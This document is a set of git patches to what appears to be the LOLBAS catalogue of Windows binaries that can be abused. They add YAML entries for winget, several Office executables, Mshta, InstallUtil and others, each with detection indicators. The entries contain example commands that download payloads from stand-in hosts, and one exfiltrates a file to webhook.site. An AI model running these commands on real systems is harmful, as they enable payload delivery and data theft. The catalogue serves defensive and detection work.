From 83ca9aa1974bc545b4a4a8a75dd6ebd12a02b8a4 Mon Sep 17 00:00:00 2001 From: saulpanders <34975519+saulpanders@users.noreply.github.com> Date: Tue, 4 Oct 2022 06:27:47 -0400 Subject: [PATCH 1/4] Adding Windows Package Manager tool winget.exe (#188) Co-authored-by: Wietze --- yml/OSBinaries/Winget.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/Winget.yml diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml new file mode 100644 index 0000000..4e9d4e5 --- /dev/null +++ b/yml/OSBinaries/Winget.yml @@ -0,0 +1,28 @@ +--- +Name: winget.exe +Description: Windows Package Manager tool +Author: Paul Sanders +Created: 2022-01-03 +Commands: + - Command: winget.exe install --manifest manifest.yml + Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"' + Usecase: Download and execute an arbitrary file from the internet + Category: Execute + Privileges: Local Aministrator - required to enabled local manifest setting + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe +Code_Sample: + - Code: https://gist.github.com/saulpanders/00e1177602a8c01a3a8bfa932b3886b0 +Detection: + - IOC: winget.exe spawned with local manifest file + - IOC: Sysmon Event ID 1 - Process Creation + - Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html + - Sigma: https://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml +Resources: + - Link: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html + - Link: https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended +Acknowledgement: + - Person: Paul + Handle: '@saulpanders' From 143a6639f82607627fdf9c66827a70221baa66ca Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Tue, 4 Oct 2022 06:50:59 -0400 Subject: [PATCH 2/4] Adding .gitattributes file, fixing template/checks (#253) --- .gitattributes | 1 + .github/workflows/yaml-linting.yml | 5 +++++ YML-Template.yml | 18 ++++++++---------- 3 files changed, 14 insertions(+), 10 deletions(-) create mode 100644 .gitattributes diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..c68529d --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.yml text eol=lf diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 70d7678..120daa8 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -13,6 +13,11 @@ jobs: no_warnings: true file_or_dir: yml/**/*.yml config_file: .github/.yamllint + - name: Validate Template Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: YML-Template.yml + schema: YML-Schema.yml - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: diff --git a/YML-Template.yml b/YML-Template.yml index a9ff5b3..bae43db 100644 --- a/YML-Template.yml +++ b/YML-Template.yml @@ -4,12 +4,10 @@ Description: Something general about the binary Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality, - Alias: Binary64.exe # but for example, is built for different architecture. Author: The name of the person that created this file -Created: YYYY-MM-DD (date the person created this file) +Created: 1970-01-01 # YYYY-MM-DD (date the person created this file) Commands: - Command: The command Description: Description of the command - Aliases: - - An alias for the command (example: ProcDump.exe & ProcDump64.exe) Usecase: A description of the usecase Category: Execute Privileges: Required privs @@ -26,19 +24,19 @@ Full_Path: - Path: c:\windows\system32\bin.exe - Path: c:\windows\syswow64\bin.exe Code_Sample: - - Code: http://url.com/git.txt + - Code: http://example.com/git.txt Detection: - IOC: Event ID 10 - IOC: binary.exe spawned - - Analysis: https://link/to/blog/gist/writeup/if/applicable - - Sigma: https://link/to/sigma/rule/if/applicable - - Elastic: https://link/to/elastic/rule/if/applicable - - Splunk: https://link/to/splunk/rule/if/applicable - - BlockRule: https://link/to/microsoft/block/rules/if/applicable + - Analysis: https://example.com/to/blog/gist/writeup/if/applicable + - Sigma: https://example.com/to/sigma/rule/if/applicable + - Elastic: https://example.com/to/elastic/rule/if/applicable + - Splunk: https://example.com/to/splunk/rule/if/applicable + - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable Resources: - Link: http://blogpost.com - Link: http://twitter.com/something - - Link: Threatintelreport... + - Link: http://example.com/Threatintelreport Acknowledgement: - Person: John Doe Handle: '@johndoe' From ea68ad824d0cbe2471e8a0f08b40cb32d3acad02 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:13:56 +0700 Subject: [PATCH 3/4] Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze --- yml/OtherMSBinaries/MsoHtmEd.yml | 34 +++++++++++++++++++++++++ yml/OtherMSBinaries/Mspub.yml | 31 ++++++++++++++++++++++ yml/OtherMSBinaries/ProtocolHandler.yml | 27 ++++++++++++++++++++ 3 files changed, 92 insertions(+) create mode 100644 yml/OtherMSBinaries/MsoHtmEd.yml create mode 100644 yml/OtherMSBinaries/Mspub.yml create mode 100644 yml/OtherMSBinaries/ProtocolHandler.yml diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml new file mode 100644 index 0000000..d9c42af --- /dev/null +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -0,0 +1,34 @@ +--- +Name: MsoHtmEd.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2022-07-24 +Commands: + - Command: MsoHtmEd.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe + - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml new file mode 100644 index 0000000..8ebc14f --- /dev/null +++ b/yml/OtherMSBinaries/Mspub.yml @@ -0,0 +1,31 @@ +--- +Name: Mspub.exe +Description: Microsoft Publisher +Author: Nir Chako +Created: 2022-08-02 +Commands: + - Command: mspub.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe + - Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe +Detection: + - IOC: Suspicious Office application internet/network traffic +Acknowledgement: + - Person: 'Nir Chako (Pentera)' + Handle: '@C_h4ck_0' diff --git a/yml/OtherMSBinaries/ProtocolHandler.yml b/yml/OtherMSBinaries/ProtocolHandler.yml new file mode 100644 index 0000000..ab2b2ab --- /dev/null +++ b/yml/OtherMSBinaries/ProtocolHandler.yml @@ -0,0 +1,27 @@ +--- +Name: ProtocolHandler.exe +Description: Microsoft Office binary +Author: Nir Chako +Created: 2022-07-24 +Commands: + - Command: ProtocolHandler.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe + - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe +Detection: + - IOC: Suspicious Office application Internet/network traffic +Acknowledgement: + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' From f29471dde9cd18e59d5851165a2272a3f97c8ab5 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:27:31 +0700 Subject: [PATCH 4/4] Adding download functionality entries to existing binaries (#239) Co-authored-by: Wietze --- yml/OSBinaries/ConfigSecurityPolicy.yml | 12 +++++++++++- yml/OSBinaries/Installutil.yml | 13 ++++++++++--- yml/OSBinaries/Mshta.yml | 11 ++++++++++- yml/OSBinaries/Presentationhost.yml | 13 ++++++++++--- 4 files changed, 41 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index a433c69..5c708ff 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -1,7 +1,7 @@ --- Name: ConfigSecurityPolicy.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. -Author: 'Ialle Teixeira' +Author: Ialle Teixeira Created: 2020-09-04 Commands: - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile @@ -11,7 +11,15 @@ Commands: Privileges: User MitreID: T1567 OperatingSystem: Windows 10 + - Command: ConfigSecurityPolicy.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: + - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe Code_Sample: - Code: @@ -29,3 +37,5 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index b257c39..2b35e14 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -1,7 +1,7 @@ --- Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll @@ -18,13 +18,18 @@ Commands: Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: InstallUtil.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml @@ -39,3 +44,5 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 43717d7..1a6dd6e 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -1,7 +1,7 @@ --- Name: Mshta.exe Description: Used by Windows to execute html applications. (.hta) -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: mshta.exe evilfile.hta @@ -32,6 +32,13 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) + - Command: mshta.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe @@ -69,3 +76,5 @@ Acknowledgement: Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 957ae44..7ba0ef5 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -1,7 +1,7 @@ --- Name: Presentationhost.exe Description: File is used for executing Browser applications -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap @@ -11,11 +11,16 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: Presentationhost.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml - IOC: Execution of .xbap files may not be common on production workstations @@ -25,3 +30,5 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' + - Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0'